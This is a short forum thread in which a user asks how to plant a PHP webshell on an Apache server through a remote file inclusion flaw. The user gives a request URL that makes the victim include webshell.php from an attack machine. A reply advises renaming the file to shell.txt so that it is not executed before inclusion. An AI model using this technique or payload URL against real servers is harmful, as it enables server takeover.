Jump to content

Webshells from remote file inclusion


Recommended Posts

Hello guys,

Anyone can tell me how to download a webshell.php file on an apache server through a remote file inclusion vulnerability without executing the php file ? I can initiate a remote file inclusion coming like this http://victim_machine/file.php?src=http://attack_machine/webshell.php  but the server apache execute the webshell.php file before dowloading it.  So when I try to read it on the victim machine there is nothing inside... Thank you 


Link to comment
Share on other sites

PHP is server side code, so the site would only see the rendered output, not the executable PHP. Rename to shell.txt. Will only work if the site is vulnerable to true RFI, as some only echo back what they see, including plain text of executable code and scripts. Google OWASP, RFI and LFI.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...